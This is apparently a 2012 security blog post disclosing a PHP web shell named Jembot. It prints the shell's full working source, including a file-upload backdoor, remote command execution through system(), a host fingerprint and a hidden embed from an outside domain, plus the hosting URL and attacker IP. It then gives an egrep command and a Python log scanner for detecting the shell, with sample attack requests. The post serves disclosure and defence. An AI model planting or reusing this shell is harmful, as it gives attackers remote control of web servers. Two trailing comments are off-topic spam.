Tuesday, April 17, 2012

New web bot found [Jembot]

We have discovered a new bot, called Jembot, that spreads in the form of a PHP web shell: a file upload handler, a command execution backdoor and a host fingerprint, all in one short script.
Source code:

<?php
// Jembot web shell as captured. Three modes, selected by the query string:
//   ?jembot       -> upload form and upload handler
//   ?empix=<cmd>  -> run <cmd> with system()
//   (neither)     -> print a fingerprint of the host (lets the operator find infected sites)
// $_FILES and $_GET["empix"] are read without isset() checks; that is how the sample is
// written and it only produces PHP notices. Status strings are Indonesian/Javanese:
// gagal = failed, sukses = success, ukuran = size, mentah = raw (temp path),
// "wes enek cok" = already exists, mateng = done.
if(isset($_GET['jembot']))
{
    echo "<body bgcolor=black>
<font color=cyan size=3>";
    echo "<h2>empixcrew technology</h2><hr>";
    // The upload form posts back to the shell's own URL (action=""), keeping ?jembot.
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
    if ($_FILES["file"]["error"] > 0)
    {
        echo "gagal: " . $_FILES["file"]["error"] . "<br />";
    }
    else
    {
        echo "sukses: " . $_FILES["file"]["name"] . "<br />";
        echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "mentah: " . $_FILES["file"]["tmp_name"];
    }
    // The upload is written next to the shell under the client-supplied name, unchanged,
    // so the operator can drop further PHP files onto the host.
    if (file_exists("" . $_FILES["file"]["name"]))
    {
        echo $_FILES["file"]["name"] . " wes enek cok. ";
    }
    else
    {
        move_uploaded_file($_FILES["file"]["tmp_name"],
        "" . $_FILES["file"]["name"]);
        echo " mateng: " . "" . $_FILES["file"]["name"];
        echo"<hr>";
    }
}
elseif ($_GET["empix"]){
    // Remote command execution: the command output goes straight into the response.
    system($_GET["empix"]);
}
else {
    // Fingerprint: OS (php_uname) and PHP version wrapped in "empixcrew:" markers that are
    // easy to grep for. $sof1 (SERVER_SOFTWARE) is collected but never printed.
    $un = php_uname();
    $sof1 = getenv("SERVER_SOFTWARE");
    $php1 = phpversion();
    echo "empixcrew: $un $php1 :empixcrew";
}
// Everything after the closing tag is sent as raw HTML: a hidden Flash object loaded from
// empixcrew.net. The captured sample ends here, truncated after <SCRIPT>.
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of the bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell.php

The attacks come from IP 187.17.65.242 (Brazil).

WHOIS:

inetnum:     187.17.64/18
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.
ownerid:     001.109.184/0001-95
responsible: Contato da Entidade UOL
country:     BR
owner-c:     CAU12
tech-c:      CAU12
inetrev:     187.17.64/20
nserver:     ns1.host.uol.com.br
nsstat:      20120412 AA
nslastaa:    20120412
nserver:     ns2.host.uol.com.br
nsstat:      20120412 AA
nslastaa:    20120412
created:     20081022
changed:     20081022

nic-hdl-br:  CAU12
person:      Contato Administrativo - UOL
e-mail:      l-registrobr-uol@corp.uol.com.br
created:     20031202
changed:     20100106

nic-hdl-br:  SEO50
person:      Security Office
e-mail:      security@uol.com.br
created:     20021114
changed:     20110830
We strongly recommend blocking this IP address and running the following command over your web server logs to detect the attacks:
# egrep -n --color "hell.php" *.log
This finds requests that fetch or reference the dropper by its file name. Once the shell has been installed under another name it can still be found by the two query parameters it responds to, "jembot" (upload form) and "empix=" (command execution), which can be searched for in the same way.
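To complement the egrep above, here is an added example (not from the original post) of the same search carried out over an access log in Python, extended with the two indicators the shell's own source gives us: the "jembot" and "empix" query parameters. The log lines are constructed for the example; the attacking IP and the dropper name come from the post, while the request that passes the bot URL in a query parameter is an assumed delivery path, since the post only gives the hosting URL.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators from the post (dropper name, attacking IP) and from the shell source
# (?jembot -> upload form, ?empix=<cmd> -> system()).
DROPPER_NAME = "hell.php"
ATTACKER_IP = "187.17.65.242"
SHELL_PARAMS = {"jembot": "upload", "empix": "exec"}

# Constructed sample of Apache combined-format log lines (not real traffic).
# The second line assumes the bot URL is passed in a query parameter; the post
# only gives the URL, not the delivery method.
SAMPLE_LOG = """\
187.17.65.242 - - [12/Apr/2012:03:14:07 +0000] "GET /wp-content/uploads/2011/12/chase/hell.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
187.17.65.242 - - [12/Apr/2012:03:14:09 +0000] "GET /index.php?page=http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
187.17.65.242 - - [12/Apr/2012:03:15:01 +0000] "GET /images/hell.php?empix=uname%20-a HTTP/1.1" 200 310 "-" "Mozilla/5.0"
187.17.65.242 - - [12/Apr/2012:03:15:30 +0000] "POST /images/hell.php?jembot HTTP/1.1" 200 410 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Apr/2012:03:16:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Apr/2012:03:17:00 +0000] "GET /about.php?id=3 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [timestamp], "request line", status, bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators(entry):
    """List the Jembot indicators present in one parsed entry (empty list if clean)."""
    found = []
    target = entry["target"]
    # Same string the post greps for, checked after URL-decoding the request target.
    if DROPPER_NAME in unquote(target):
        found.append("dropper_name")
    if entry["ip"] == ATTACKER_IP:
        found.append("attacker_ip")
    # keep_blank_values keeps a bare "?jembot" (no "=") as a key with an empty value.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for param, mode in SHELL_PARAMS.items():
        if param in query:
            found.append("shell_" + mode)
    return found


def scan(log_text):
    """Scan a whole log. Returns (hits, per-ip counter); each hit is (ip, target, indicators)."""
    hits = []
    by_ip = Counter()
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        found = indicators(entry)
        if found:
            hits.append((entry["ip"], entry["target"], found))
            by_ip[entry["ip"]] += 1
    return hits, by_ip


if __name__ == "__main__":
    hits, by_ip = scan(SAMPLE_LOG)
    for ip, target, found in hits:
        print(f"{ip:16} {', '.join(found):40} {target}")
    print("suspicious requests per IP:", dict(by_ip))
```

Run against a real log, the per-IP counter is the quick triage view: an address that both fetches the dropper and later sends "empix=" requests has the shell installed somewhere on the host, and the "target" column tells you where.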

9 comments:

  1. Oh my goodness! An amazing article, dude. Thank you. However, I am experiencing an issue with your RSS. Don't know why I am unable to subscribe to it. Is there anyone getting an identical RSS problem? Anyone who knows, kindly respond. Thanks

  2. There are certainly a lot of details like that to take into consideration. That is a great point to bring up. I offer the thoughts above as general inspiration, but clearly there are questions like the one you bring up where the most important thing will be working in honest good faith. I don't know if best practices have emerged around things like that, but I am sure that your job is clearly identified as a fair game. Both boys and girls feel the impact of just a moment's pleasure, for the rest of their lives.
